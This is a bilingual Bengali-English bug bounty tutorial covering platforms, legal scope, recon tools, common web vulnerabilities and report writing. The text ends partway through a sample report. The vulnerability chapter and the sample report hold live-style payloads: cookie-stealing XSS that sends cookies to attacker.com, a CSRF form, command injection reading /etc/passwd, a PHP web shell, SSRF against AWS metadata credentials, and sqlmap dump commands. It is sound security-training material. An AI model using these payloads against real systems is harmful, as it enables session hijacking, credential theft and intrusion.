Bug Bounty Hunting v2.0

📋 বিষয়সূচি — সম্পূর্ণ তালিকা 📋 Table of Contents — Full List

০১ Bug Bounty কী এবং কেন করব?What is Bug Bounty & Why Do It?

Bug Bounty এর ইতিহাস, কীভাবে কাজ করে, কারা করেHistory, how it works, who does it

Legal ও Ethical দিক, Responsible DisclosureLegal & ethical aspects, responsible disclosure

০২ শুরু করার আগে — Prerequisites ও SetupBefore You Start — Prerequisites & Setup

কী কী শিখতে হবে, কোন Skills দরকারWhat to learn, which skills are needed

Environment Setup — Kali, Burp Suite, ToolsEnvironment Setup — Kali, Burp Suite, Tools

০৩ Platform পরিচিতি ও Program বেছে নেওয়াPlatform Overview & Choosing Programs

HackerOne, Bugcrowd, Intigriti, YesWeHack, Synack

Private vs Public Program, VDP vs Paid ProgramPrivate vs Public Programs, VDP vs Paid

০৪ Reconnaissance — তথ্য সংগ্রহInformation Gathering

Passive Recon: WHOIS, Google Dorks, Shodan, crt.sh

Active Recon: Subdomain Enumeration, Port Scanning

Directory Bruteforce, JS File Analysis, API Endpoint Discovery

০৫ Bug খোঁজার পদ্ধতি ও MethodologyBug Hunting Methodology

কোথায় Bug থাকে? Attack Surface বোঝাWhere do bugs live? Understanding attack surface

Proxy Setup, Request Manipulation, Parameter Tampering

০৬ সাধারণ Vulnerability সমূহCommon Vulnerabilities

XSS, SQL Injection, IDOR, SSRF, Open Redirect, CSRF

LFI/RFI, XXE, RCE, Broken Auth, Business Logic Flaws

০৭ Tools ও Automation

Burp Suite, ffuf, subfinder, httpx, nuclei, amass

dalfox, sqlmap, gau, waybackurls, gf, hakrawler

০৮ Bug Report কিভাবে লিখতে হয়How to Write a Bug Report

ভালো Report এর বৈশিষ্ট্য, কী লিখলে তাড়াতাড়ি Triage হয়Characteristics of good reports, quick triage tips

CVSS Score, Severity Rating, Impact Statement

০৯ Report-এ কী কী থাকে — সম্পূর্ণ TemplateReport Structure — Complete Template

Title, Summary, Steps to Reproduce, Impact, PoC, Remediation

Screenshot, Video, Payload সহ উদাহরণExamples with screenshots, video, payload

১০ Submission Process — কিভাবে Submit করেSubmission Process — How to Submit

HackerOne ও Bugcrowd-এ Submit করার ধাপStep-by-step submission on H1 & Bugcrowd

Duplicate এড়ানো, Scope চেক করাAvoiding duplicates, scope checking

১১ Triage, Communication ও NegotiationNegotiation

Triage কী, N/A vs Informative vs DuplicateWhat is triage, N/A vs Informative vs Duplicate

Bounty Negotiation কিভাবে করেHow to negotiate bounty

১২ Bounty পাওয়া, Payment ও Hall of FameGetting Paid, Payment & Hall of Fame

PayPal, Bank Transfer, Swag, CVE

Bangladesh থেকে Bounty পাওয়ার পদ্ধতিReceiving bounties from Bangladesh

১৩ Advanced Techniques ও Tips

Chained Bugs, Business Logic, GraphQL Testing, OAuth Flaws

Rate Limiting Bypass, Race Conditions, 2FA Bypass

১৪ Career Path, Resources ও Cheat SheetCareer Path, Resources & Cheat Sheet

PortSwigger Web Academy, HackTheBox, TryHackMe

সম্পূর্ণ Cheat Sheet ও Quick ReferenceComplete Cheat Sheet & Quick Reference

Chapter 01

🎯 Bug Bounty কী এবং কেন করব?What is Bug Bounty & Why Do It?

ইতিহাস, কীভাবে কাজ করে, কারা করে, এবং কত টাকা আয় করা যায়History, how it works, who does it, and how much you can earn

🐛 Bug Bounty কী?What is Bug Bounty?

Bug Bounty হলো একটি Program যেখানে কোম্পানিগুলো তাদের Software, Website বা Application-এ Security Vulnerability খুঁজে দেওয়ার জন্য Researcher বা Hacker-দের পুরস্কার (Bounty) দেয়। এটা মূলত কোম্পানির Permission নিয়ে, তাদের সিস্টেম হ্যাক করার চেষ্টা করা — যাকে বলা হয় Ethical Hacking বা Penetration Testing। Bug Bounty is a program where companies reward researchers or hackers for finding security vulnerabilities in their software, websites, or applications. It is essentially attempting to hack a company's systems with their permission — this is called Ethical Hacking or Penetration Testing.

💡 সহজ ভাষায়Simply put

কল্পনা করো — Google বলছে: "আমাদের Website-এ কোনো Security Hole খুঁজে দিতে পারলে তোমাকে $10,000 দেবো।" তুমি সেটা খুঁজে দিলে — এটাই Bug Bounty! Imagine — Google says: "Find a security hole in our website and we'll pay you $10,000." You find it — that's Bug Bounty!

📜 ইতিহাসHistory

সালYear	ঘটনাEvent
1995	Netscape প্রথম Bug Bounty Program চালু করেNetscape launches the first Bug Bounty Program
2004	Mozilla Bug Bounty চালু করে ($500/bug)Mozilla launches Bug Bounty ($500/bug)
2010	Google ও Facebook নিজস্ব Bug Bounty শুরু করেGoogle and Facebook start their own Bug Bounty programs
2012	HackerOne প্রতিষ্ঠিত হয় — dedicated Bug Bounty PlatformHackerOne founded — dedicated Bug Bounty Platform
2014	Bugcrowd প্রতিষ্ঠিত, crowd-based security testingBugcrowd founded, crowd-based security testing
2022+	বিশ্বব্যাপী $1 Billion+ Bounty প্রদান করা হয়েছেOver $1 Billion+ in bounties paid worldwide

💰 কত টাকা আয় করা যায়?How Much Can You Earn?

🥉 শুরুতেBeginner

$50–$500

Low/Medium severity bug, VDP ProgramsLow/Medium severity bugs, VDP Programs

🥈 মধ্যবর্তীIntermediate

$500–$10,000

High severity bugs, Private programsHigh severity bugs, Private programs

🥇 Expert

$10K–$1M+

Critical bugs, RCE, Zero-days, Big TechCritical bugs, RCE, Zero-days, Big Tech

⚖️ Legal ও Ethical দিকAspects

🚨 গুরুত্বপূর্ণ সতর্কতাCritical Warning

শুধুমাত্র authorized Program-এ কাজ করো। কোনো Website Permission ছাড়া test করলে সেটা Cybercrime। সবসময় Program-এর Scope ভালো করে পড়ো। Only work on authorized programs. Testing any website without permission is a cybercrime. Always read the program scope carefully.

✅ যা করা যাবেWhat You Can Do

Program Scope-এর মধ্যে test করাTest within program scope
Data না নিয়ে Vulnerability প্রমাণ করাProve vulnerability without taking data
Responsible Disclosure follow করাFollow responsible disclosure
Fix হওয়ার আগে public না করাDon't disclose publicly before fix

❌ যা করা যাবে নাWhat You Cannot Do

Scope-এর বাইরে attack করাAttack outside scope
Real user data নেওয়া বা দেখাAccess or take real user data
DoS/DDoS attack করাConduct DoS/DDoS attacks
Social Engineering করাConduct social engineering

🎯 Chapter সারসংক্ষেপChapter Summary

💡 Bug Bounty = Permission নিয়ে হ্যাক করা এবং পুরস্কার পাওয়াBug Bounty = Hack with permission and get rewarded
💰 Beginner থেকে Expert — $50 থেকে $1M+ আয় সম্ভবFrom beginner to expert — $50 to $1M+ earnings possible
⚖️ সবসময় Scope মেনে চলো, Legal দিক মাথায় রেখোAlways follow scope, keep legal aspects in mind

Chapter 02

🛠️ শুরু করার আগে — Prerequisites ও SetupBefore You Start — Prerequisites & Setup

কী শিখতে হবে, কোন Tools দরকার, কিভাবে Environment তৈরি করবেWhat to learn, which tools are needed, how to set up your environment

📚 যা শিখতে হবে (Roadmap)What You Must Learn (Roadmap)

ভিত্তি তৈরি করোBuild Your Foundation

প্রথমে এই বিষয়গুলো ভালো করে শিখোLearn these topics thoroughly first

HTTP/HTTPS HTML/JS Basics Linux CLI Networking Basics Cookie & Session

⬇

Tools শেখোLearn Tools

Bug Bounty-র জন্য প্রয়োজনীয় ToolsEssential tools for bug bounty

Burp Suite nmap ffuf subfinder nuclei

⬇

Vulnerability শেখোLearn Vulnerabilities

OWASP Top 10 এবং common bugsOWASP Top 10 and common bugs

XSS SQLi IDOR SSRF CSRF RCE

⬇

Practice করো ও Hunt শুরু করোPractice & Start Hunting

Lab practice করো, তারপর real program-এ যাওPractice in labs, then go to real programs

PortSwigger Labs HackTheBox TryHackMe Real Programs

💻 Environment SetupEnvironment Setup

Kali Linux Setup

# Kali Linux Update করো sudo apt update && sudo apt upgrade -y # Essential Tools Install sudo apt install -y nmap subfinder httpx-toolkit nuclei ffuf \ amass gobuster feroxbuster curl wget git python3-pip # Go-based tools go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install github.com/projectdiscovery/httpx/cmd/httpx@latest go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install github.com/tomnomnom/gf@latest go install github.com/lc/gau/v2/cmd/gau@latest # Nuclei Templates Update nuclei -update-templates

Burp Suite Setup

🔧 Burp Suite Community (Free)

Burp Suite Community Edition বিনামূল্যে পাওয়া যায়। Professional Edition ($449/year) আরও শক্তিশালী। শুরুতে Community দিয়ে কাজ চলবে। Burp Suite Community Edition is free. Professional Edition ($449/year) is more powerful. Community is fine to start with.

Burp Download করোDownload Burp Suite

portswigger.net/burp/communitydownload থেকে Download করোfrom portswigger.net/burp/communitydownload

Browser Proxy Configure

Browser-এ Proxy: 127.0.0.1:8080 সেট করো। FoxyProxy extension ব্যবহার করলে সহজ হবে।Set browser proxy to 127.0.0.1:8080. Using FoxyProxy extension makes it easier.

CA Certificate Install

http://burp থেকে Certificate download করে Browser-এ import করো। HTTPS traffic দেখা যাবে।Download certificate from http://burp and import into browser. You'll then see HTTPS traffic.

🛠️ Chapter সারসংক্ষেপChapter Summary

📚 HTTP, HTML, Linux, Networking — এগুলো আগে শেখোHTTP, HTML, Linux, Networking — learn these first
🔧 Burp Suite + Kali Linux = Bug Bounty-র মূল SetupBurp Suite + Kali Linux = Core Bug Bounty Setup
🎯 PortSwigger Labs-এ Practice করলে দ্রুত শেখা যায়Practice on PortSwigger Labs to learn fast

Chapter 03

🌐 Platform পরিচিতি ও Program বেছে নেওয়াPlatform Overview & Choosing Programs

HackerOne, Bugcrowd সহ সব Platform এবং সঠিক Program খোঁজার কৌশলAll major platforms including HackerOne, Bugcrowd and strategies for finding the right program

🏆 প্রধান Bug Bounty PlatformsMajor Bug Bounty Platforms

Platform	URL	বৈশিষ্ট্যFeatures	উপযুক্ততাBest For
HackerOne	hackerone.com	সবচেয়ে বড়, বেশি ProgramLargest, most programs	সবার জন্যFor all
Bugcrowd	bugcrowd.com	বড় Company-র ProgramsBig company programs	Intermediate
Intigriti	intigriti.com	Europe-based, ভালো BountyEurope-based, good bounties	Intermediate
YesWeHack	yeswehack.com	European focus, growingEuropean focus, growing	Beginner
Synack	synack.com	Vetted researchers onlyVetted researchers only	Expert
Open Bug Bounty	openbugbounty.org	Free, without registrationFree, without registration	Beginner

🎯 Program বেছে নেওয়ার কৌশলStrategy for Choosing Programs

✅ Beginner-দের জন্য ভালো ProgramGood Programs for Beginners

💰 বড় Bounty দেয় না কিন্তু শেখা যায়Doesn't pay big but you learn
🔓 Wide Scope — বেশি domainWide scope — more domains
⏰ New Program — কম duplicateNew program — fewer duplicates
📱 Mobile App programMobile app programs
🏷️ Public ও VDP programPublic and VDP programs

❌ শুরুতে এড়িয়ে যাওAvoid at the Start

🏛️ Google, Apple, Microsoft (অনেক competition)Google, Apple, Microsoft (high competition)
🔒 Private Program (invitation only)Private programs (invitation only)
💳 Financial/Banking programs (high risk)Financial/Banking programs (high risk)
⛔ Narrow Scope programNarrow scope programs

📋 Program Scope বোঝাUnderstanding Program Scope

📌 Scope কী?

Scope হলো সেই Domain বা Assets যেগুলো Test করার Permission আছে। Scope-এর বাইরে গেলে তোমার Report Invalid হবে এবং Legal ঝামেলায় পড়তে পার। Scope is the set of domains or assets you're permitted to test. Going out of scope will invalidate your report and may get you into legal trouble.

# HackerOne Program Scope Example IN SCOPE (test করা যাবে): *.example.com # সব subdomain api.example.com # API mobile app (Android/iOS) OUT OF SCOPE (test করা যাবে না): blog.example.com # আলাদা platform cdn.example.com # CDN *.third-party.com # Third party services DoS/DDoS attacks Social Engineering

🆚 VDP vs Paid Program

	VDP (Vulnerability Disclosure)	Paid Bug Bounty
পুরস্কারReward	শুধু Hall of Fame বা SwagOnly Hall of Fame or Swag	Cash Bounty ($50–$1M+)Cash Bounty ($50–$1M+)
প্রতিযোগিতাCompetition	কমLower	বেশিHigher
শেখার সুযোগLearning	ভালোGood	ভালোGood
Beginner-দের জন্যFor beginners	✅ পারফেক্টPerfect	শিখে তারপরAfter learning

🌐 Chapter সারসংক্ষেপChapter Summary

🏆 HackerOne ও Bugcrowd — শুরু করার সেরা জায়গাHackerOne and Bugcrowd — best places to start
🎯 Wide Scope, New Program, VDP দিয়ে শুরু করোStart with wide scope, new programs, VDP
📋 Scope সবসময় মনোযোগ দিয়ে পড়োAlways read scope carefully

Chapter 04

🔍 Reconnaissance — তথ্য সংগ্রহInformation Gathering

Target সম্পর্কে যত বেশি জানবে, Bug খুঁজে পাওয়ার সম্ভাবনা তত বেশিThe more you know about the target, the higher your chance of finding bugs

🗺️ Recon Pipeline — কী কী করতে হবেRecon Pipeline — What to Do

TARGET (example.com) │ ├─── Passive Recon (নিরাপদ, কোনো traffic পাঠানো হয় না) │ ├── WHOIS, DNS lookup │ ├── Google Dorks │ ├── Shodan / Censys │ ├── crt.sh (SSL Certificates) │ ├── waybackurls (old URLs) │ └── GitHub Recon (leaked secrets) │ └─── Active Recon (Target-এ direct request পাঠানো হয়) ├── Subdomain Enumeration (subfinder, amass) ├── Port Scanning (nmap) ├── HTTP Probing (httpx) ├── Directory Bruteforce (ffuf, gobuster) ├── JS File Analysis └── API Endpoint Discovery

🔎 Passive Recon Techniques

Google Dorks

# Target সম্পর্কে তথ্য খোঁজার Google Dorks site:example.com # সব indexed page site:example.com filetype:pdf # PDF files site:example.com inurl:admin # Admin panels site:example.com inurl:login # Login pages site:example.com ext:php inurl:id= # PHP pages with id param site:example.com "api_key" # Leaked API keys site:github.com "example.com" password # Leaked credentials

Subdomain Enumeration

# subfinder দিয়ে subfinder -d example.com -o subdomains.txt # amass দিয়ে (বেশি সময় লাগে কিন্তু বেশি পায়) amass enum -d example.com -o amass_results.txt # crt.sh থেকে (certificate transparency) curl "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value' | sort -u # সব result এক সাথে করে httpx দিয়ে live check cat subdomains.txt | httpx -silent -o live_hosts.txt # Output example https://api.example.com [200] [API Gateway] [nginx] https://admin.example.com [200] [Admin Panel] [Apache] https://dev.example.com [200] [Development Site]

Port Scanning

# nmap দিয়ে port scan nmap -sV -sC -p- --min-rate 5000 example.com # Web ports focus nmap -p 80,443,8080,8443,8888 -sV example.com # Common open ports যা interesting 21 → FTP (anonymous login check) 22 → SSH (weak credential check) 80 → HTTP 443 → HTTPS 3306 → MySQL (exposed DB!) 6379 → Redis (unauthenticated access) 27017→ MongoDB (exposed DB!)

Directory & File Bruteforce

# ffuf দিয়ে directory bruteforce ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -u https://example.com/FUZZ \ -mc 200,301,302,403 # gobuster দিয়ে gobuster dir -u https://example.com \ -w /usr/share/wordlists/dirb/common.txt \ -x php,html,js,txt # API endpoint discovery ffuf -w wordlists/api_endpoints.txt \ -u https://api.example.com/FUZZ \ -H "Content-Type: application/json"

JavaScript File Analysis

# gau দিয়ে সব JS URL সংগ্রহ echo "example.com" | gau | grep "\.js$" | sort -u > js_files.txt # JS file থেকে API endpoints, secrets বের করা cat js_files.txt | xargs -I{} curl -s {} | grep -Eo '(http|https)://[^"]+' | sort -u # Sensitive data in JS grep -r "api_key\|apikey\|secret\|password\|token" js_files/

⚠️ GitHub Recon

GitHub-এ Company-র leaked secrets খোঁজো — API keys, passwords, database credentials অনেক সময় public repo-তে থাকে। Search GitHub for the company's leaked secrets — API keys, passwords, database credentials are often found in public repos.

# GitHub-এ search করো site:github.com "example.com" "api_key" site:github.com "example.com" "password" site:github.com "example.com" "secret" site:github.com "example.com" ".env" # trufflehog দিয়ে repo scan trufflehog github --repo=https://github.com/examplecorp/repo

🔍 Chapter সারসংক্ষেপChapter Summary

🗺️ Recon = Passive (নিরাপদ) + Active (সরাসরি)Recon = Passive (safe) + Active (direct)
🔎 Google Dorks → Subdomain → Port Scan → Directory Brute → JS AnalysisGoogle Dorks → Subdomain → Port Scan → Directory Brute → JS Analysis
💡 GitHub Recon অনেক সময় direct API key দিয়ে দেয়!GitHub Recon often directly reveals API keys!

Chapter 05

🐛 Bug খোঁজার পদ্ধতি ও MethodologyBug Hunting Methodology

কোথায় Bug থাকে, কিভাবে খুঁজতে হয়, Burp Suite দিয়ে কীভাবে কাজ করতে হয়Where bugs live, how to find them, and how to work with Burp Suite

🎯 Attack Surface বোঝা — কোথায় Bug থাকে?Understanding Attack Surface — Where Do Bugs Live?

🌐 Web Application-এIn Web Applications

Login / Registration Form
Search Box (XSS, SQLi)
File Upload Feature
Password Reset Flow
Profile Edit Page
Comment / Feedback Box
Payment / Checkout

🔌 API-তে

REST API Endpoints
GraphQL Queries
User ID manipulation (IDOR)
Unauthenticated endpoints
HTTP Method tampering
JWT Token flaws
API versioning issues

🔧 Burp Suite দিয়ে কাজ করাWorking with Burp Suite

HTTP Request Intercept ও Modify করাIntercepting & Modifying HTTP Requests

Intercept চালু করোTurn on Intercept

Burp → Proxy → Intercept → ON

Browser-এ Action করোPerform Action in Browser

Request Modify করোModify the Request

Parameter পরিবর্তন করো, Payload inject করো, তারপর Forward করোChange parameters, inject payloads, then forward

Repeater / Intruder ব্যবহার করোUse Repeater / Intruder

Request → Right Click → Send to Repeater। বারবার test করতে Repeater ব্যবহার করো।Right-click Request → Send to Repeater. Use Repeater for repeated testing.

🧪 Parameter Tampering — সবচেয়ে বেশি Bug এখানেParameter Tampering — Most Bugs Are Here

# Normal Request GET /profile?user_id=1001 HTTP/1.1 Host: example.com Authorization: Bearer eyJhbGciOiJIUzI1NiJ9... # IDOR Test — অন্যের user_id দিয়ে দেখো GET /profile?user_id=1002 HTTP/1.1 ← অন্যের data দেখা যাচ্ছে? = IDOR Bug! GET /profile?user_id=0 HTTP/1.1 ← Admin profile? GET /profile?user_id=-1 HTTP/1.1 ← Negative ID? GET /profile?user_id=null HTTP/1.1 ← Null value? # Hidden Parameter খোঁজা POST /login HTTP/1.1 {"username":"admin","password":"pass","role":"admin"} ← hidden param inject

🐛 Chapter সারসংক্ষেপChapter Summary

🎯 Login, Search, Upload, API — এই জায়গাগুলোয় সবচেয়ে বেশি Bug থাকেLogin, Search, Upload, API — these areas have the most bugs
🔧 Burp Suite-র Intercept + Repeater = Bug Hunter-এর সবচেয়ে শক্তিশালী অস্ত্রBurp Suite's Intercept + Repeater = most powerful weapon for bug hunters
🧪 সব Parameter Manipulate করে দেখোTest all parameters by manipulating them

Chapter 06

💉 সাধারণ Vulnerability সমূহCommon Vulnerabilities

XSS, SQLi, IDOR, SSRF, CSRF, RCE — প্রতিটি Bug বিস্তারিতXSS, SQLi, IDOR, SSRF, CSRF, RCE — each bug in detail

🔴 XSS — Cross-Site Scripting

📌 কী?What?

Attacker-এর Malicious JavaScript অন্য User-এর Browser-এ Execute হয়।Attacker's malicious JavaScript executes in another user's browser.

⚠️ ক্ষতিImpact

Cookie Theft, Session Hijacking, Phishing, Keylogging

# Reflected XSS Test Payloads <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> "><script>alert(document.domain)</script> <body onload=alert(1)> # Stored XSS — comment box-এ insert করো <script>document.location='http://attacker.com/?c='+document.cookie</script> # DOM XSS — URL fragment https://example.com/#<img src=x onerror=alert(1)> # WAF Bypass payloads <ScRiPt>alert(1)</ScRiPt> <sc<script>ript>alert(1)</script>

🔴 SQL Injection

# Basic SQLi Test ' OR '1'='1 ' OR '1'='1'-- " OR "1"="1 admin'-- 1' ORDER BY 1-- 1' UNION SELECT NULL-- # sqlmap দিয়ে automatic test sqlmap -u "https://example.com/item?id=1" --dbs sqlmap -u "https://example.com/item?id=1" -D database_name --tables sqlmap -u "https://example.com/item?id=1" -D db -T users --dump # POST request-এ sqlmap -u "https://example.com/login" \ --data="username=admin&password=test" \ --dbs

🔴 IDOR — Insecure Direct Object Reference

💡 Bug Bounty-তে IDOR সবচেয়ে বেশি পাওয়া যায়!IDOR is found most often in Bug Bounty!

User ID, Order ID, File ID — এই ধরনের ID পরিবর্তন করলে যদি অন্যের data দেখা বা পরিবর্তন করা যায়, সেটাই IDOR। If changing User ID, Order ID, File ID, etc. allows you to view or modify someone else's data, that's IDOR.

# IDOR Test Examples GET /api/invoice/1234 → 1235, 1236... (Sequential IDs) GET /download?file=user1.pdf → user2.pdf DELETE /api/comment/5678 → অন্যের comment delete? # UUID/GUID হলেও test করো GET /api/profile/550e8400-e29b-41d4-a716-446655440000 # HTTP Method tampering GET → POST, PUT, DELETE # method পরিবর্তন করে দেখো # Horizontal vs Vertical IDOR Horizontal: same role, different user data (user1 → user2) Vertical: user → admin data (more critical!)

🔴 SSRF — Server-Side Request Forgery

# SSRF Test — Internal IP access url=http://127.0.0.1/admin url=http://localhost/ url=http://169.254.169.254/latest/meta-data/ # AWS metadata url=http://192.168.1.1/ # Internal network # SSRF Bypass techniques http://0x7f000001/ # Hex notation of 127.0.0.1 http://[::1]/ # IPv6 localhost http://localtest.me/ # Domain resolving to 127.0.0.1 # SSRF দিয়ে AWS credentials চুরি http://169.254.169.254/latest/meta-data/iam/security-credentials/

🔴 CSRF — Cross-Site Request Forgery

# CSRF Test HTML (victim-এর ব্রাউজারে open হলে তাদের account-এ action হবে) <html> <body onload="document.forms[0].submit()"> <form method="POST" action="https://example.com/change-email"> <input type="hidden" name="email" value="attacker@evil.com"> </form> </body> </html> # CSRF Token Bypass 1. Token remove করে দেখো 2. Token-এর value empty করো 3. অন্য user-এর valid token দিয়ে দেখো 4. Token-এর length change করো

🔴 RCE — Remote Code Execution (সর্বোচ্চ SeverityHighest Severity)

🚨 Critical — $10,000 to $1,000,000+

RCE মানে Server-এ সরাসরি Command Execute করা যাচ্ছে। এটা Bug Bounty-তে সবচেয়ে বড় Bug এবং সবচেয়ে বেশি Bounty পাওয়া যায়। RCE means you can execute commands directly on the server. This is the biggest bug in Bug Bounty and pays the most.

# RCE Test Payloads ; ls -la | whoami && cat /etc/passwd $(id) `id` # File Upload RCE (PHP shell) shell.php → <?php system($_GET['cmd']); ?> shell.php.jpg (extension bypass) # Deserialization RCE, Template Injection {{7*7}} # SSTI test → 49 আসলে vulnerable ${7*7} <%= 7*7 %>

📊 Vulnerability Severity TableVulnerability Severity Table

Vulnerability	Severity	Avg Bounty	Frequency
RCE, SQLi (auth bypass)	🔴 Critical	$10K–$1M+	⭐⭐
SSRF, XXE, IDOR (sensitive), SQLi	🟠 High	$1K–$10K	⭐⭐⭐
XSS (stored), CSRF, Broken Auth	🟡 Medium	$200–$1K	⭐⭐⭐⭐
XSS (reflected), Open Redirect	🟢 Low	$50–$200	⭐⭐⭐⭐⭐
Info Disclosure, Security Headers	🔵 Info	$0–$50/Swag	⭐⭐⭐⭐⭐

💉 Chapter সারসংক্ষেপChapter Summary

🥇 IDOR সবচেয়ে common — সব ID parameter test করোIDOR is most common — test all ID parameters
💰 RCE সবচেয়ে বেশি Bounty দেয়RCE pays the most bounty
🎯 XSS শেখা সহজ, শুরুতে এটা দিয়েই শুরু করোXSS is easiest to learn, start with it

Chapter 07

🤖 Tools ও Automation

Bug Bounty-র জন্য সেরা Tools এবং Automation দিয়ে দ্রুত কাজ করাBest tools for bug bounty and using automation to work faster

🧰 Essential Tools ListEssential Tools List

Tool	Category	কাজUse	Command
Burp Suite	Proxy	HTTP intercept, modify, replayHTTP intercept, modify, replay	`burpsuite`
subfinder	Recon	Subdomain খোঁজাSubdomain discovery	`subfinder -d target.com`
httpx	Recon	Live host checkLive host check	`httpx -l hosts.txt`
nuclei	Scanner	Template-based vulnerability scanTemplate-based vuln scan	`nuclei -u target.com`
ffuf	Fuzzer	Directory/Parameter bruteDirectory/Parameter brute	`ffuf -w list.txt -u URL/FUZZ`
dalfox	XSS	Automatic XSS scannerAutomatic XSS scanner	`dalfox url "https://target.com?q=1"`
sqlmap	SQLi	SQL Injection scannerSQL injection scanner	`sqlmap -u "URL?id=1"`
gau	Recon	Wayback URLs সংগ্রহCollect wayback URLs	`gau target.com`
amass	Recon	Deep subdomain enumDeep subdomain enum	`amass enum -d target.com`
gf	Filter	URL pattern matchingURL pattern matching	`gau target.com \| gf xss`

⚡ Automation Pipeline — এক কমান্ডে সবAutomation Pipeline — All in One Command

#!/bin/bash # Bug Bounty Automation Script TARGET=$1 echo "[+] Starting Recon for: $TARGET" # Step 1: Subdomain Enumeration subfinder -d $TARGET -silent | \ httpx -silent -o live_${TARGET}.txt echo "[+] Live Hosts: $(wc -l live_${TARGET}.txt)" # Step 2: Nuclei Scan nuclei -l live_${TARGET}.txt \ -t ~/nuclei-templates/ \ -severity medium,high,critical \ -o nuclei_${TARGET}.txt # Step 3: URL Collection & XSS Test cat live_${TARGET}.txt | \ gau | \ gf xss | \ dalfox pipe -o xss_${TARGET}.txt echo "[+] Done! Check results in *_${TARGET}.txt files"

🔍 Nuclei দিয়ে Automated ScanningAutomated Scanning with Nuclei

# Specific vulnerability type scan nuclei -u https://example.com -t cves/ # Known CVEs nuclei -u https://example.com -t exposures/ # Exposed files nuclei -u https://example.com -t misconfigurations/ # Multiple targets nuclei -l targets.txt -t ~/nuclei-templates/ -severity high,critical # Custom template nuclei -u https://example.com -t my_custom.yaml

🤖 Chapter সারসংক্ষেপChapter Summary

🔧 Burp Suite + nuclei + dalfox = Bug Bounty-র Core ToolkitBurp Suite + nuclei + dalfox = Core Bug Bounty Toolkit
⚡ Automation দিয়ে একসাথে বেশি target cover করা যায়Automation lets you cover more targets simultaneously
📊 nuclei দিয়ে known CVE ও misconfig দ্রুত পাওয়া যায়nuclei quickly finds known CVEs and misconfigs

Chapter 08

📝 Bug Report কিভাবে লিখতে হয়How to Write a Bug Report

একটি ভালো Report-ই তোমার Bounty নিশ্চিত করে — Report লেখার পূর্ণ গাইডA good report is what secures your bounty — complete guide to writing reports

💡 ভালো Report কেন গুরুত্বপূর্ণ?Why is a Good Report Important?

✅ ভালো Report-এর ফলGood Report Results

দ্রুত Triage হয়Fast triage
বেশি Bounty পাওয়া যায়Higher bounty awarded
Company তোমাকে বিশ্বাস করেCompany trusts you
Private Program invitation পাওয়া যায়Private program invitations received

❌ খারাপ Report-এর ফলBad Report Results

N/A বা Informative mark হয়Marked N/A or Informative
কম Bounty পাওয়া যায়Lower bounty paid
Ban বা Reputation কমেBanned or reputation drops
Triage টিম frustrated হয়Triage team frustrated

📊 CVSS Score বোঝাUnderstanding CVSS Score

CVSS (Common Vulnerability Scoring System) হলো Bug-এর Severity মাপার স্ট্যান্ডার্ড পদ্ধতি। 0–10 স্কেলে Bug-এর গুরুত্ব বোঝায়। CVSS (Common Vulnerability Scoring System) is the standard method for measuring bug severity. It indicates the importance of a bug on a 0–10 scale.

Score	Severity	উদাহরণExample
9.0–10.0	🔴 Critical	RCE without auth, SQLi admin bypass
7.0–8.9	🟠 High	SSRF, Stored XSS, Sensitive IDOR
4.0–6.9	🟡 Medium	Reflected XSS, CSRF, IDOR (low impact)
0.1–3.9	🟢 Low	Open Redirect, Info Disclosure
0.0	🔵 Info	Best practices missing

✍️ Report লেখার Golden RulesGolden Rules for Writing Reports

Title — স্পষ্ট ও Specific হওTitle — Be Clear and Specific

❌ Bad: "XSS found"
✅ Good: "Stored XSS in /profile/bio via name parameter allows cookie theft"

Steps — Step by step লেখোSteps — Write step by step

Triage টিম যেন হুবহু Reproduce করতে পারে। প্রতিটি Step numbered হবে।The triage team must be able to reproduce it exactly. Every step should be numbered.

Proof of Concept (PoC)

Screenshot, Video বা Code দাও। Video সবচেয়ে ভালো।Provide screenshot, video, or code. Video is best.

Impact পরিষ্কার করোClarify Impact

"এই Bug দিয়ে কী করা সম্ভব?" — Worst case scenario লেখো।"What is possible with this bug?" — Write the worst case scenario.

Remediation সাজেস্ট করোSuggest Remediation

Fix করার পরামর্শ দাও — এটা Bounty বাড়ায়।Suggest how to fix — this increases bounty.

📝 Chapter সারসংক্ষেপChapter Summary

📌 ভালো Title = ৫০% কাজ শেষGood Title = 50% of the work done
🎥 PoC Video দিলে Bounty বাড়েPoC video increases bounty
💡 Impact স্পষ্টভাবে বলো — "কী ক্ষতি হতে পারে"Clearly state impact — "what damage could occur"

Chapter 09

📋 Report-এ কী কী থাকে — সম্পূর্ণ TemplateReport Structure — Complete Template

Professional Bug Report-এর প্রতিটি Section বিস্তারিত — Real Example সহEvery section of a professional bug report in detail — with real examples

📄 সম্পূর্ণ Report TemplateComplete Report Template

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ BUG BOUNTY REPORT ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ TITLE: Stored XSS in /user/profile via 'bio' field allows session hijacking of any user SEVERITY: High (CVSS: 8.2) CVSS: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N ASSET: https://app.example.com/user/profile DATE: 2024-01-15 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ VULNERABILITY SUMMARY ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ The 'bio' field in user profile settings does not properly sanitize user input, allowing an attacker to inject malicious JavaScript that executes in the browser of any user who visits the attacker's profile. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ STEPS TO REPRODUCE ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1. Create an account at https://app.example.com/register 2. Log in and go to Profile Settings 3. In the "Bio" field, enter the following payload: <script>document.location='https://attacker.com/?c='+document.cookie</script> 4. Click "Save Profile" 5. Log in as another user (victim) 6. Visit the attacker's profile page 7. Observe: victim's session cookie is sent to attacker's server ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ PROOF OF CONCEPT (PoC) ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 📸 Screenshot: [attached - xss_poc_1.png] Shows the 